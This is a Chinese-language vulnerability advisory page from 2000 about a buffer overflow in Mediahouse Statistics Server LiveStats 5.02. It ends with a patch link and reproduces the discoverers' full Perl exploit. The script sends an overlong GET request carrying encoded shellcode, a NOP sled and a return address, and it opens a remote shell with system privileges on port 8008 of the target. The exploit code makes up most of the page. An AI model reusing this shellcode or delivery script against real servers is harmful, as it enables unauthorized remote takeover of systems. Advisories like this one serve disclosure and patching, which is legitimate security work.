首页 -> 安全研究

安全研究

安全漏洞
Statistics Server LiveStats缓冲区溢出漏洞

发布日期:2000-08-16
更新日期:2000-08-16

受影响系统:
Mediahouse Software Statistics Server LiveStats 5.02
   - Microsoft Windows NT 4.0
描述:
Mediahouse Statistics Server LiveStats 很容易遭到缓冲区溢出攻击。如果URL请
求由GET命令和超过2030字节长度的字符串构成,前者有可能崩溃甚至执行任意代码。

<* 来源:Nemo
         |Zan  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

两位发现者公布了如下测试程序

--------------------------------------------------------------------------
#!/usr/bin/perl -w
# Statistics Server 5.02x's exploit.
# usage: ./ssexploit502x.pl hostname port
# 00/08/10
#
# http://deepzone.cjb.net      
# http://mareasvivas.cjb.net  (|Zan homepage)
#
# --|Zan
# ----------------------------------------------------------------
#
# This exploit works against Statistics Server 5.02x/Win2k.
#
# Tested with Win2k (spanish version).
#
# It spawns a remote winshell on 8008 port. It doesn't kill
# webserver so webserver continues running while hack is made.
# When hack is finished webserver will run perfectly too.
#
# Default installation gives us a remote shell with system
# privileges.
#
# overflow discovered by
# -- Nemo
#
# exploit coded by
# -- |Zan
#
# ----------------------------------------------------------------

use IO::Socket;


@crash = (
"\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41",
"\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f",
"\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04",
"\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e",
"\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32",
"\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99",
"\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c",
"\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9",
"\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71",
"\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9",
"\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93",
"\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99",
"\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99",
"\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14",
"\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17",
"\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d",
"\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99",
"\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66",
"\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d",
"\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7",
"\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9",
"\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9",
"\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a",
"\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14",
"\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87",
"\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9",
"\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32",
"\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99",
"\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98",
"\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf",
"\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99",
"\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3",
"\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3",
"\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99",
"\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99",
"\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13",
"\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9",
"\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2",
"\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf",
"\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a",
"\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c",
"\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d",
"\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9",
"\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa",
"\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
"\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99",
"\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3",
"\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4",
"\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07",
"\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c",
"\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03",
"\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a",
"\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b",
"\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07",
"\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97",
"\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9",
"\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c",
"\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9",
"\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99",
"\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9",
"\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66",
"\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d",
"\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d",
"\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
"\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99",
"\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
"\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99",
"\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1",
"\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d",
"\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
"\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99",
"\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14",
"\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c",
"\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99",
"\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12",
"\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a",
"\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34",
"\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99",
"\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1",
"\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2",
"\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38",
"\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59",
"\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce",
"\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6",
"\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd",
"\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8",
"\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7",
"\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5",
"\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed",
"\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab",
"\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0",
"\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8",
"\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8",
"\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb",
"\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc",
"\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0",
"\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5",
"\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8",
"\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0",
"\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5",
"\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc",
"\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1",
"\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99",
"\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc",
"\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90");

# -------------------------------------------------------------------

sub pcommands
{
die "usage: $0 hostname port\n" if (@ARGV != 2);
($host) = shift @ARGV;
($port) = shift @ARGV;
}

sub show_credits
{
print "\n\n\t (c) 2000 Deep Zone - Statistics Server 5.02x's exploit\n";
print "\n\t\t  Coded by |Zan \n";
print "\n\t-=[  http://deepzone.cjb.net ]=-\n\n";
}

sub bofit
{

print "\nspawning remote shell on port 8008 ...\n\n";

$s = IO::Socket::INET->new(PeerAddr=>$host,
                                   PeerPort=>$port,
       Proto=>"tcp");

if(!$s) { die "error.\n"; }

print $s "GET http://O";

foreach $item (@crash) {
         print $s $item
              }

for ($cont=0; $cont<840;$cont++) {
  print $s "\x90"
              }

print $s "\x8c\x3e\x1d\x01";

print $s "\r\n\r\n";

while (<$s>) { print }

print "... done.\n\n";

}

# ----- begin

show_credits;
pcommands;
bofit;

# ----- that's all :)
--------------------------------------------------------------------------

建议:
Mediahouse发布了如下补丁:

http://www.mediahouse.com/statisticsserver/download_trial/dist/ss50.exe

浏览次数:7980
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障